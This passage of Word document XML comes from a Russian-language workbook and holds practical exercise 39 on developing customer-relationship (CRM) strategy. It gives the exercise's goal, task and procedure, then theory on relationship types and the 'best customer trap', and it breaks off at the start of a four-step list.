        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие действия необходимы чтобы интернет-ресурс не терял свою популярность?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Является ли обновление базы данных товаров интернет магазина примером информационной поддержки?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="_Toc507788284"/>
      <w:bookmarkStart w:id="237" w:name="_Toc507788559"/>
      <w:bookmarkStart w:id="238" w:name="_Toc26278758"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="0079051C" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработка системы собственных взаимоотношений с клиентами</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
      <w:bookmarkEnd w:id="237"/>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработка стратегии взаимоотношений с потенциальными клиентами на основе партнерства и предоставления услуги, отвечающей потребностям клиента. Формирование навыков общения с клиентами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Согласно рекомендациям из теоретической части необходимо составить алгоритм </w:t>
      </w:r>
      <w:r w:rsidR="0079051C" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">разработки системы собственных взаимоотношений с клиентами </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>информационной поддержки ресурса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся результаты анализа сайта и алгоритм информационной поддержки сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ознакомиться с понятием информационной поддержки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установить список элементов сайта нуждающихся в информационной поддержке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать алгоритм информационной поддержки интернет-магазина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="007650F3" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Первый принцип: воспринимать клиента не только как потребителя, но, в первую очередь, как живого человека. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для того чтобы реализовать этот принцип, необходимо научиться различать такие понятия, как </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>информация</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>смысл</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Обладание информацией подразумевает ее сведение к более мелким составляющим, которыми удобно управлять. В то время как нахождение смысла подразумевает составление этих частей в большие по размеру абстрактные единицы. К сожалению, современные CRM-системы разработаны именно для управления информацией: они дают мало представления о том, как тот или иной бренд влияет на жизнь человека. Однако ситуация обстоит таким образом, что индивидуальный жизненный контекст формирует взаимоотношения компании и клиента. Контекстуальные зацепки могут быть рассеяны, но если компания уделит им внимание, они могут стать эффективным рычагом для построения прочного взаимодействия. Следует развивать сопереживание эмоциональному состоянию клиента и умение оценить опыт взаимодействия его глазами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Второй принцип: расширять границы размышлений за пределы оценки лояльности.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> В работе с базами данных, которые сегментированы по затратам и прибыльности клиентов за период активности, компании попадают в ловушку: они строят стратегию, основываясь на результатах взаимодействия, а не на затраченных усилиях и средствах (т. е. вложениях во взаимоотношения), которые могут дать представление о воспринимаемой ценности с точки зрения клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Различают 18 типов взаимоотношений клиента и бренда. Взаимодействие может быть интенсивным и длительным, в другом случае – поверхностным и скоротечным. Некоторые взаимоотношения могут выстраиваться вокруг эмоциональных или социальных потребностей, другие – быть ориентированными на утилитарные цели. Они могут быть иерархичными или равноправным с точки зрения распределения власти. По тону взаимоотношения могут быть положительными или негативными. Несмотря на то, что перечень типов взаимоотношений достаточно широк, компании продолжают заострять внимание только на так называемых лояльных </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>браках с брендом</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, в то время как существуют и другие эмоционально окрашенные формы взаимодействия: например, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>лучший друг</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>навязчивая идея</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>бурная жизнь</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Вместо того чтобы фокусироваться только на </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>браках</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, необходимо работать с тем типом, который больше всего подходит вашему бренду.</w:t>
      </w:r>
      <w:r w:rsidR="00D565C2" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Результаты исследований, проведенных авторами статьи, указывают на тот факт, что в каждом типе взаимоотношений существует потенциал для получения прибыли. Основная хитрость заключается в том, чтобы понять характер </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>соглашения о сотрудничестве</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в каждом конкретном случае. Соглашения по поводу взаимоотношений устанавливают нормы и условия взаимодействия, и они также сигнализируют, что руководство компании должно делать, чтобы сохранить эти взаимоотношения благополучными. Кроме того, соглашения регулируют потенциальные экономические выгоды, так как различные типы соглашений требуют разное количество времени и ресурсов. Хотя </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>лучший друг</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>брак</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> занимают близкие эмоциональные позиции, внутри этих типов действуют совершенно разные правила: </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>брак</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это социально поддерживаемый контракт, благодаря которому взаимоотношения сохраняются, несмотря на изменяющиеся обстоятельства. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Лучший друг</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, напротив, представляет собой добровольный тип взаимоотношений, основанный на взаимном интересе. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Брак</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> стимулирует приверженность, любовь и преданность. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Лучший друг</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это тесная связь и взаимное сотрудничество. Партнеры по </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>браку</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> устанавливают барьеры и препятствия для их нарушения, в то время как принципы типа взаимоотношений </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>лучший друг</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> не предусматривают такие ситуации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Какие действия должно предпринимать руководство компании после изучения матрицы типов взаимоотношений? Во-первых, менеджеры должны быть хорошо осведомлены о тех типах, которые встречаются среди их клиентов, и о частоте проявления каждого типа. Это поможет им выделять сегменты взаимоотношений, разрабатывать программы, вести учет взаимодействий в соответствии с правилами регулирующего соглашения и распределять ресурсы с ориентацией на удержание и рост.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Третий принцип: взять на себя ответственность за двусторонние взаимоотношения.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Большое значение имеют действия по улучшению взаимоотношений, в которых образовалось напряжение. Большая доля бизнес-отношений обладает конфликтным характером, и, когда возникает недопонимание, руководства компаний спешат винить клиентов. Когда клиент опаздывает на важное заседание из-за задержки рейса, руководство авиакомпании склонно считать, что он должен был взять билеты на день раньше. Или, если авиакомпания теряет багаж путешественника с важными лекарствами, вину клиента находят в том, что он не взял их с собой в салон. Эффективные CRM-системы должны помочь компаниям осознать свой вклад в построение как успешных, так и напряженных взаимоотношений. Существует характерная особенность: когда менеджеры решают сосредоточиться на сохранении высокого уровня удержания клиентов и на работе с клиентами, склонными к оппортунистическому поведению, во многих случаях выясняется, что эти люди – как раз те, которых компания так старается культивировать через CRM-систему. Авторы называют это явление </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ловушка лучшего клиента</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Лучшие клиенты</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это естественное следствие работы CRM-программ, для которых платиновые клиенты являются главной целью. Такая ситуация возникает, когда компании поощряют хороших клиентов скидками, одаривают их вниманием и позволяют нарушать правила. С течением времени их запросы и ожидания повышаются, они часто становятся более дорогими в содержании и создают утечку прибыли.</w:t>
      </w:r>
      <w:r w:rsidR="00D565C2" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если компании стремятся к максимизации ценности своих отношений с покупателями в будущем, они должны пересмотреть свои взгляды на воспринимаемую ценность сотрудничества с точки зрения самого клиента и на способы ее измерения. Вместо того чтобы работать над увеличением прибыли на каждого клиента и уменьшать расходы на обслуживание, в долгосрочной перспективе более выгодным представляется фокус на управлении стоимостью взаимоотношений (капиталом взаимоотношений) – работа над ценностью всего портфеля взаимоотношений с клиентами. В процессе разработки CRM-программы компаниям следует анализировать каждую категорию взаимоотношений: начиная с тех клиентов, которым присущи продолжительные, партнерские взаимодействия с компанией, и заканчивая теми, с кем компания находится в краткосрочных отношениях, которые можно охарактеризовать как </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>бурная жизнь</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Управление стоимостью взаимоотношений включает в себя 4 шага:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Анализ портфеля взаимоотношений с клиентами</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
